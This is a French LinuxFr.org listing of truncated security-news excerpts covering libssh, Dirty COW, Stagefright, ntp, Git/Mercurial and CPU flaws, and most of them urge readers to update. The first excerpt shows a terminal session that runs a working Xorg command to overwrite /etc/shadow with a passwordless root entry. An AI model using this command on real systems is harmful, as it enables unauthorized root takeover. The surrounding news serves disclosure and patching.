Journal La faille grosse comme une maison

[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
Journal demain soir on finit tard
Le CVE 2018-10933 concernant la libssh est limpide : demain on reporte tout à après demain et à la place on fait les mises à jour (si si, même pour toi le petit serveur du fond de la classe qui ne fait jamais ses mises à jour à cause de /place ici une mauvaise excuse/ )
bonjour server
bonjour
je voudrais avoir un accès
vous avez besoin d'un mot de passe, $user
mais je n'en ai aucun !
(…)
Lien Nethammer : Pas de trace. La recherche des cartes réseaux impactées commence ?
Lien Attention, utilisateurs de PGP : de nouvelles failles exigent une action immédiate de votre part
Lien 8 nouvelles failles semblables à Spectre, dont 4 majeures
Journal [~Signet] Failles de sécurité dans les CPU : AMD revient dans la course !

Les processeurs Ryzen/EPYC d'AMD (et leurs chipsets) ont aussi leurs failles de sécurité – il n'y a pas qu'Intel dans ce petit jeu. Ah, et les chipsets sont concernés aussi.
Ce qui est vraiment dommage, c'est qu'AMD avait beaucoup communiqué sur la sécurité de ses solutions au moment des failles Spectre et Meltdown…
Liens :
Billet sous licence CC-0.
Journal La bonne faille et la mauvaise faille
La bonne faille, le pirate il arrive, il l'exploite. La mauvaise faille, le pirate il arrive, il l'exploite aussi, mais c'est pas pareil! Après les failles terribles que sont Spectre et Meltdown, on voit poindre de nouveaux articles annonçant une nouvelle faille dans les processeurs intel.
Lors du démarrage des machines bénéficiant de Intel vPro, une combinaison de touche permet d'accéder au MEBx (Management Engine BIOS Extension). Le mot de passe par défaut, "admin", permet ensuite de contrôler la (…)
Journal CVE-2016-5195 Dirty COW

On va faire très court, il ne me semble pas avoir vu passer d’information sur LinuxFr.org au sujet de la très sérieuse faille du noyau Linux de la semaine, qui existe depuis 9 ans et qui a reçu le joli nom de Dirty COW. C’est la mode les petits noms pour les failles, un peu comme les noms pour les ouragans…
- http://arstechnica.com/security/2016/10/most-serious-linux-privilege-escalation-bug-ever-is-under-active-exploit/ ;
- http://www.nextinpact.com/news/101856-une-faille-dans-kernel-linux-vieille-9-ans-corrigee-mais-deja-exploitee.htm.
Mettez à jour votre distro, c’est le moment !
N. D. M. : voir les liens supplémentaires dans ce commentaire.
Revue de presse de l'April pour la semaine 42 de l'année 2015
La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.
Sommaire
- [Libération.fr] Plus de 140 000 votes pour la consultation en ligne sur la «République numérique»
- [Maghreb Emergent] Le logiciel libre une option encore méconnue dans l’administration algérienne
- [LeMagIT] PaaS Open Source: les principales difficultés rencontrées
- [Le Journal de Montréal] Le centre du libre éclate
- [Techniques de l'Ingénieur] Les avions à la merci des pirates?
- [Next INpact] L'EFF s'érige contre la possibilité d'inclure des DRM dans le format JPEG
- [Numerama] 260 experts exigent l'Open Source pour les firmwares importants
- [Le Monde.fr] Si vous n’avez rien suivi au Tafta, le grand traité qui effraie
Journal Stagefright, une faille Android qui va faire mal ?
C'est marrant de voir comment toute faille découverte doit avoir son petit nom maintenant. C'est à celui qui aura la plus grosse le plus de succès.
Il n'empêche que celle-ci à l'air pas mal. La société Zimperium a annoncée sur son blog la découverte d'une faille qui toucherait 95% des mobiles Android. Celle-ci permettrait d'exécuter du code à distance uniquement avec un numéro de téléphone, le votre, et un MMS.
La faille se situerait dans la bibliothèque de lecture (…)
Quoi de neuf côté LinuxFr.org
La dernière dépêche de cette catégorie LinuxFr.org qui ne soit pas une dépêche récurrente type « Les meilleurs journaux du mois » ou « Les prix du mois » ou « Les statistiques de l'année » remonte à mai 2014 pour une mise à jour du serveur. Voici donc, à l'aube de l'été, quelques actualités de type « en coulisses ».
Mises à jour ntp à faire suite à la faille CVE-2014-9295
De multiples failles de sécurité ont été identifiées et comblées dans ntp (le logiciel de ntp.org, pas le protocole NTP en général) ces derniers jours. Il s'agit de plusieurs failles avec notamment :
- deux dépassements de mémoire tampon qui peuvent permettre un déni de service ou l'exécution de code avec les privilèges du processus ntpd lancé ;
- d'une faiblesse dans la génération des clés, il est donc conseillé de recréer ces dernières après la mise à jour dans certains cas.
Elles ne sont pas forcément exploitables ou d'une grande dangerosité en dehors d'une d'utilisation avancée / serveur ntpd, mais il est préférable d'être prévenu :)
Cette faille a été identifiée et nommée CVE-2014-9295. Elle concerne toutes les versions de ntp jusqu'à la 4.2.7 et la version corrective 4.2.8 est parue le 18 décembre 2014.
NdM : il existe d'autres logiciels libres pouvant servir pour la synchronisation NTP, comme openntpd (non vulnérable) issu d'OpenBSD, Ntimed (client uniquement) sponsorisé par la Linux Foundation, chrony, etc.
Journal Mises à jour NTP

Bonjour,
Juste un petit journal bookmark très rapide pour signaler à ceux qui seraient passés à coté de l'info : de multiples failles de sécurité ont étés identifiées et comblées dans NTP ces derniers jours.
Il s'agit de plusieurs failles avec notamment :
- Deux dépassements de mémoire tampon qui peuvent permettre un déni de service ou l'exécution de code par un attaquant avec les privilèges de l'utilisateur NTP.
- D'une faiblesse dans la génération des clés, il est donc (…)
Vulnérabilité dans Git et Mercurial sur certains systèmes de fichiers (FAT, NTFS, HFS+, etc.)
Une vulnérabilité (CVE-2014-9390) a été annoncée hier soir concernant le logiciel de gestion de versions le plus en vogue en ce moment, j'ai nommé Git, ainsi que sur Mercurial, autre logiciel de la même catégorie. Elle a déjà été corrigée, je vous invite donc à mettre à jour vos installations.
Github, le service d'hébergement de dépôt Git lui aussi très en vogue, a de son côté annoncé avoir vérifié tous les dépôts présents sur ses serveurs à la recherche d'exploitations de cette vulnérabilité. Mesure de sécurité supplémentaire, il refuse désormais les push exploitant cette faille.
NdM : Merci à RoM1 et Sébastien Douche pour les précisions apportées dans la dépêche. La faille a été trouvée par le créateur de Mercurial, Matt Mackall, et Augie Fackler. La vulnérabilité se décline en trois parties :
- la sensibilité à la casse dans Git, déjà corrigé dans Mercurial en 2008 ;
- l’expansion des noms courts sous Windows (PROGRA~1 → Program Files), déjà corrigé dans Mercurial ;
- la découverte récente de la façon non documentée dont Darwin (Apple) s’amuse avec HFS+ à ignorer certains caractères spéciaux et qui peut créer de nouvelles collisions de nom (cf la correction chez Mercurial, qui a permis la correction côté Git).